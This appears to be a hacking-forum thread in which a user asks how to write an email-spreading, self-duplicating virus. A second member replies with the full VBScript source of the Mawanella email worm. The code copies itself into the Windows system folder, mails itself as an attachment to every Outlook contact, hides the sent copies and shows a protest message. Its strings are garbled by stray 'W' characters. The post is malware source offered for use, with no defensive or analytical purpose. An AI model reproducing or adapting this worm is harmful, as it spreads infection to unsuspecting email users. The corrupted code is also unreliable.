Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



 2486

Wanting to know how to make a worm.

by Duccy - 30 March, 2021 - 08:18 AM
This post is by a banned member (Duccy) - Unhide
Duccy  
Registered
16
Posts
1
Threads
3 Years of service
#1
Hey :)

So, I have basic coding knowledge, but haven't made any tools or anything like that (yet). I wanna know where to start when making a self duplicating virus that spreads via email, I have my own computers to test it on and am interested as to how they work. If anyone wouldn't mind sharing some knowledge, reply to this or DM me on Discord @ Duccy#8616 

Hope you're all having a great day, stay safe  coffee
Just a funky monke tryna make it in this cold, hard world.

Pepe chair

 
This post is by a banned member (koningjory) - Unhide
134
Posts
0
Threads
2 Years of service
#2
On Error Resume Next
Rem // I hate Mawanella incident
Set WW_S = CreateObject(W"WWScript.ShellW")
Set fso = CreateObject(W"Scripting.FileSystemObjectW")
set file = fso.OpenTextFile(WWScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr, strMsg
set wscr=CreateObject(W"WWScript.ShellW")
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set cFile = fso.GetFile(WWScript.ScriptFullName)
cFile.Copy(dirsystem&W"\Mawanella.vbsW")
Set OutlookA = CreateObject(W"Outlook.ApplicationW")
If OutlookA = W"OutlookW" Then
Set Mapi=OutlookA.GetNameSpace(W"MAPIW")
Set AddLists=Mapi.AddressLists
For Each ListIndex In AddLists
If ListIndex.AddressEntries.Count <> 0 Then
ContactCountX = ListIndex.AddressEntries.Count
For Count= 1 To ContactCountX
Set MailX = OutlookA.CreateItem(0)
Set ContactX = ListIndex.AddressEntries(Count)
'msgbox contactx.address
'Mailx.Recipients.Add(ContactX.Address)
MailX.To = ContactX.Address
MailX.Subject = W"MawanellaW"
MailX.Body = vbcrlf&W"Mawanella is one of the Sri Lanka's Muslim VillageW"&vbcrlf
'Set Attachment=MailX.Attachments
'Attachment.Add dirsystem & W"\Mawanella.vbsW"
'Mailx.Attachments.Add(dirsystem & W"\Mawanella.vbsW")
Mailx.Attachments.Add(dirsystem & W"\Mawanella.vbsW")
MailX.DeleteAfterSubmit = True
If MailX.To <> W"W" Then
MailX.Send
End If
Next
End If
Next
Else
msgBox W"Please Forward this to everyoneW"
End if
strMsg= W" ) (W" & vbcrlf
strMsg= strMsg & W"( ) ( ) W" & vbcrlf
strMsg= strMsg & W" ( ) ( )W" & vbcrlf
strMsg= strMsg & W" ( ) ( )W" & vbcrlf
strMsg= strMsg & W" -------------------------W" & vbcrlf
strMsg= strMsg & W" / ( ( ( /\W" & vbcrlf
strMsg= strMsg & W" / ( / \W" & vbcrlf
strMsg= strMsg & W" / ( ( / \W" & vbcrlf
strMsg= strMsg & W" --------------------------------W" & vbcrlf
strMsg= strMsg & W" | --- | |W" & vbcrlf
strMsg= strMsg & W" | ----- | | | |W" & vbcrlf
strMsg= strMsg & W" | | | --- | |W" & vbcrlf
strMsg= strMsg & W" | | | | |W" & vbcrlf
strMsg= strMsg & W" --------------------------------W" & vbcrlf
strMsg= strMsg & W"Mawanella is one of the Sri Lanka's Muslim Village.W" & vbcrlf
strMsg= strMsg & W"This brutal incident happened here 2 Muslim Mosques & 100 Shops are burnt.W" &
vbcrlf
strMsg= strMsg & W"I hat this incident, WWhat about you? I can destroy your computerW" & vbcrlf
strMsg= strMsg & W"I didn't do that because I am a peace-loving citizen.W"
msgbox strMsg,,W"MawanellaW"

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 1 Guest(s)